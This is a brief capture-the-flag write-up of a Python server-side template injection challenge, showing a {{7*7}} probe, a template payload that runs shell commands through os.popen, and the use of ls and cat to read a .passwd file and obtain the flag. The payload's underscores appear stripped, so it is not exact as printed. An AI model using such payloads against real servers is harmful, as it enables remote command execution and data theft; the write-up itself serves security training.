← Back
Python-Server-side-Template-Injection-Introduction | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

By supplying:
{{7*7}} , and recieving: 49, we can assume SSTI is working here. SSTI PoC

So, I simply went to PayloadAllTheThings SSTI and grabbed this payload, which is called Exploit The SSTI By Calling os.popen().read()

{{ self.init.globals.builtins.import(‘os’).popen(‘id’).read() }} Then, as you can see the command id executed.

So, I run ls and saw the file .passwd exists, and read it using cat .passwd to achieve the flag. FINAL img

Flag: Python_SST1_1s_co0l_4nd_mY_p4yl04ds_4r3_1ns4n3!!!